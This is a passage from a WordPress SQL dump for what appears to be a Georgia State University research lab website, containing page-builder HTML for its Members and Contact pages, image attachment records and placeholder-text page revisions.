class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c215-outer\">\n <div data-colibri-id=\"182-c215\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c215 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c216\" class=\"d-block style-913 style-local-182-c216 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Angelique-e1697207062254.jpg\" class=\"wp-image-1757 style-913-image style-local-182-c216-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c216-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c217\" class=\"h-global-transition-all h-heading style-914 style-local-182-c217 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c217\">\n <!---->\n <!---->\n <h4 class=\"\">Angelique Willis</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c218\" class=\"h-text h-text-component style-915 style-local-182-c218 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c219\" class=\"style-917 style-local-182-c219 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c220-outer\">\n <div data-colibri-id=\"182-c220\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c220 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c221\" class=\"d-block style-913 style-local-182-c221 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\" class=\"wp-image-1763 style-913-image style-local-182-c221-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c221-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c222\" class=\"h-global-transition-all h-heading style-914 style-local-182-c222 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c222\">\n <!---->\n <!---->\n <h4 class=\"\">Joshua Quiroz</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c223\" class=\"h-text h-text-component style-915 style-local-182-c223 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c224\" class=\"style-917 style-local-182-c224 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Members','','publish','closed','closed','','members','','','2024-11-14 09:48:38','2024-11-14 14:48:38','',0,'https://gsudice.dataconn.net/?page_id=182',0,'page','',0),(183,1,'2023-09-29 11:36:36','2022-02-15 18:06:18',' ','','','publish','closed','closed','','183','','','2023-09-29 11:36:36','2023-09-29 15:36:36','',0,'https://gsudice.dataconn.net/2022/02/15/183/',5,'nav_menu_item','',0),(185,1,'2022-02-15 18:06:30','2022-02-15 18:06:30','<div data-colibri-id=\"185-c1\" class=\"style-395 style-local-185-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"185-c2\" id=\"content\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-396 style-local-185-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"185-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-397 style-local-185-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-398-outer style-local-185-c4-outer\">\n <div data-colibri-id=\"185-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-398 style-local-185-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"185-c5\" class=\"h-global-transition-all h-heading style-400 style-local-185-c5 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-400 style-local-185-c5\">\n <!---->\n <!---->\n <h2 class=\"\">Contact Us</h2>\n </div>\n </div>\n <div data-colibri-id=\"185-c6\" class=\"h-text h-text-component style-401 style-local-185-c6 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>We are located on the 18th Floor of 25 Park Place at the Georgia State University downtown campus. </p>\n <p>Phone: (404) 919-0757\n <br>Email: dice@cs.gsu.edu</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-406-outer style-local-185-c7-outer\">\n <div data-colibri-id=\"185-c7\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-406 style-local-185-c7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Contact','','publish','closed','closed','','contact','','','2022-04-08 11:45:31','2022-04-08 15:45:31','',0,'https://gsudice.dataconn.net/?page_id=185',0,'page','',0),(186,1,'2023-09-29 11:36:36','2022-02-15 18:06:30',' ','','','publish','closed','closed','','186','','','2023-09-29 11:36:36','2023-09-29 15:36:36','',0,'https://gsudice.dataconn.net/2022/02/15/186/',6,'nav_menu_item','',0),(187,1,'2022-02-15 18:06:30','2022-02-15 18:06:30','','Contact','','inherit','closed','closed','','185-revision-v1','','','2022-02-15 18:06:30','2022-02-15 18:06:30','',185,'https://gsudice.dataconn.net/?p=187',0,'revision','',0),(189,1,'2022-02-15 18:09:53','2022-02-15 18:09:53','','eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9','','inherit','open','closed','','eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9','','','2022-02-15 18:09:53','2022-02-15 18:09:53','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9.webp',0,'attachment','image/webp',0),(190,1,'2022-02-15 18:10:03','2022-02-15 18:10:03','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9.webp','cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9.webp','','inherit','open','closed','','cropped-eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9-webp','','','2022-02-15 18:10:03','2022-02-15 18:10:03','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9.webp',0,'attachment','image/webp',0),(191,1,'2022-02-15 18:10:20','2022-02-15 18:10:20','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp','cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp','','inherit','open','closed','','cropped-eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9-1-webp','','','2022-02-15 18:10:20','2022-02-15 18:10:20','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp',0,'attachment','image/webp',0),(192,1,'2022-02-15 18:13:30','2022-02-15 18:13:30','','eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9','','inherit','open','closed','','eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9-2','','','2022-02-15 18:13:30','2022-02-15 18:13:30','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp',0,'attachment','image/webp',0),(193,1,'2022-02-15 18:13:46','2022-02-15 18:13:46','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1.webp','cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1.webp','','inherit','open','closed','','cropped-eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9-1-1-webp','','','2022-02-15 18:13:46','2022-02-15 18:13:46','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1.webp',0,'attachment','image/webp',0),(220,1,'2022-02-15 18:38:13','2022-02-15 18:38:13','','colibri-image-31.png','','inherit','open','closed','','colibri-image-31-png','','','2022-02-15 18:38:13','2022-02-15 18:38:13','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/colibri-image-31.png',0,'attachment','image/png',0),(249,1,'2022-02-15 22:25:44','2022-02-15 22:25:44','','Chetan-Tiwari_300x300','','inherit','open','closed','','chetan-tiwari_300x300','','','2022-02-15 22:25:44','2022-02-15 22:25:44','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/Chetan-Tiwari_300x300.jpg',0,'attachment','image/jpeg',0),(258,1,'2022-02-16 12:43:59','2022-02-16 12:43:59','','unsplash','','inherit','open','closed','','unsplash','','','2022-02-16 12:43:59','2022-02-16 12:43:59','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg',0,'attachment','image/jpeg',0),(287,1,'2022-02-16 15:40:57','2022-02-16 15:40:57','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"population disparities<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 15:40:57','2022-02-16 15:40:57','',168,'https://gsudice.dataconn.net/?p=287',0,'revision','',0),(288,1,'2022-02-16 15:40:57','2022-02-16 15:40:57','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c6\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c10\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c14\">\n <!---->\n <!---->\n <h5 class=\"\">population disparities</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 15:40:57','2022-02-16 15:40:57','',20,'https://gsudice.dataconn.net/?p=288',0,'revision','',0),(289,1,'2022-02-16 15:40:57','2022-02-16 